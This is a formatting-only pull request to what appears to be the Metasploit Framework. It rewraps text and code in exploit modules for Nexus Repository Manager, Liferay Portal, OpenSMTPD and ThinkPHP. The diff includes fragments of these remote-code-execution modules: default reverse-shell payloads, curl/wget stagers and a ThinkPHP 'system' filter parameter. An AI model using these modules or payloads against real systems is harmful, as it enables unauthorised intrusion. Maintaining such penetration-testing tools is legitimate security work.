### PR TITLE
Update post-RuboCop style in my recent modules

### DIFF
--- a/documentation/modules/exploit/linux/http/nexus_repo_manager_el_injection.md
+++ b/documentation/modules/exploit/linux/http/nexus_repo_manager_el_injection.md
@@ -2,12 +2,13 @@
 
 ### Description
 
-This module exploits a Java Expression Language (EL) injection in Nexus
-Repository Manager versions up to and including 3.21.1 to execute code
-as the Nexus user.
+This module exploits a Java Expression Language (EL) injection in
+Nexus Repository Manager versions up to and including 3.21.1 to
+execute code as the Nexus user.
 
-This is a post-authentication vulnerability, so credentials are required
-to exploit the bug. Any user regardless of privilege level may be used.
+This is a post-authentication vulnerability, so credentials are
+required to exploit the bug. Any user regardless of privilege level
+may be used.
 
 Tested against 3.21.1-01.
 

--- a/documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md
+++ b/documentation/modules/exploit/multi/http/liferay_java_unmarshalling.md
@@ -3,8 +3,8 @@
 ### Description
 
 This module exploits a Java unmarshalling vulnerability via JSONWS in
-Liferay Portal versions < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, and 7.2.1 GA2
-to execute code as the Liferay user. Tested against 7.2.0 GA1.
+Liferay Portal versions < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, and 7.2.1
+GA2 to execute code as the Liferay user. Tested against 7.2.0 GA1.
 
 ### Setup
 

--- a/modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
+++ b/modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
@@ -17,12 +17,13 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Nexus Repository Manager Java EL Injection RCE',
         'Description' => %q{
-          This module exploits a Java Expression Language (EL) injection in Nexus
-          Repository Manager versions up to and including 3.21.1 to execute code
-          as the Nexus user.
+          This module exploits a Java Expression Language (EL) injection in
+          Nexus Repository Manager versions up to and including 3.21.1 to
+          execute code as the Nexus user.
 
-          This is a post-authentication vulnerability, so credentials are required
-          to exploit the bug. Any user regardless of privilege level may be used.
+          This is a post-authentication vulnerability, so credentials are
+          required to exploit the bug. Any user regardless of privilege level
+          may be used.
 
           Tested against 3.21.1-01.
         },
@@ -40,9 +41,13 @@ class MetasploitModule < Msf::Exploit::Remote
         'Platform' => 'linux',
         'Arch' => [ARCH_X86, ARCH_X64],
         'Privileged' => false,
-        'Targets' => [['Nexus Repository Manager <= 3.21.1', {}]],
+        'Targets' => [
+          ['Nexus Repository Manager <= 3.21.1', {}]
+        ],
         'DefaultTarget' => 0,
-        'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp' },
+        'DefaultOptions' => {
+          'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
+        },
         'CmdStagerFlavor' => %i[curl wget],
         'Notes' => {
           'Stability' => [CRASH_SAFE],
@@ -114,8 +119,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     res = send_request_cgi({
       'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path,
-                             '/service/rapture/session'),
+      'uri' => normalize_uri(target_uri.path, '/service/rapture/session'),
       'vars_post' => {
         'username' => Rex::Text.encode_base64(username),
         'password' => Rex::Text.encode_base64(password)

--- a/modules/exploits/multi/http/liferay_java_unmarshalling.rb
+++ b/modules/exploits/multi/http/liferay_java_unmarshalling.rb
@@ -18,8 +18,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'Name' => 'Liferay Portal Java Unmarshalling via JSONWS RCE',
         'Description' => %q{
           This module exploits a Java unmarshalling vulnerability via JSONWS in
-          Liferay Portal versions < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, and 7.2.1 GA2
-          to execute code as the Liferay user. Tested against 7.2.0 GA1.
+          Liferay Portal versions < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, and 7.2.1
+          GA2 to execute code as the Liferay user. Tested against 7.2.0 GA1.
         },
         'Author' => [
           'Markus Wulftange', # Discovery
@@ -41,7 +41,9 @@ class MetasploitModule < Msf::Exploit::Remote
           ['Liferay Portal < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, 7.2.1 GA2', {}]
         ],
         'DefaultTarget' => 0,
-        'DefaultOptions' => { 'PAYLOAD' => 'java/meterpreter/reverse_tcp' },
+        'DefaultOptions' => {
+          'PAYLOAD' => 'java/meterpreter/reverse_tcp'
+        },
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],

--- a/modules/exploits/unix/smtp/opensmtpd_mail_from_rce.rb
+++ b/modules/exploits/unix/smtp/opensmtpd_mail_from_rce.rb
@@ -41,7 +41,9 @@ class MetasploitModule < Msf::Exploit::Remote
           ]
         ],
         'DefaultTarget' => 0,
-        'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' },
+        'DefaultOptions' => {
+          'PAYLOAD' => 'cmd/unix/reverse_netcat'
+        },
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],

--- a/modules/exploits/unix/webapp/thinkphp_rce.rb
+++ b/modules/exploits/unix/webapp/thinkphp_rce.rb
@@ -48,7 +48,9 @@ class MetasploitModule < Msf::Exploit::Remote
             'Platform' => 'unix',
             'Arch' => ARCH_CMD,
             'Type' => :unix_cmd,
-            'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' }
+            'DefaultOptions' => {
+              'PAYLOAD' => 'cmd/unix/reverse_netcat'
+            }
           ],
           [
             'Linux Dropper',
@@ -111,7 +113,9 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'index.php'),
-      'vars_get' => { 's' => rand_text_alpha(8..42) }
+      'vars_get' => {
+        's' => rand_text_alpha(8..42)
+      }
     )
 
     unless res
@@ -256,7 +260,9 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'index.php'),
-      'vars_get' => { 's' => 'captcha' },
+      'vars_get' => {
+        's' => 'captcha'
+      },
       'vars_post' => {
         '_method' => '__construct',
         'filter[]' => 'system', # TODO: Debug ARCH_PHP


### PR DESCRIPTION
Mostly 80 columns (yeah, I know) and additional whitespace to complement the lack of alignment. Should help with readability.

Assigning myself. There are only formatting changes in this PR.

- [x] Verify `tools/dev/msftidy.rb`
- [x] Verify `tools/dev/msftidy_docs.rb`
- [x] Verify `rubocop -a`

Finalizes fixes in #13274 and #13299. See #13253 for a more recent application.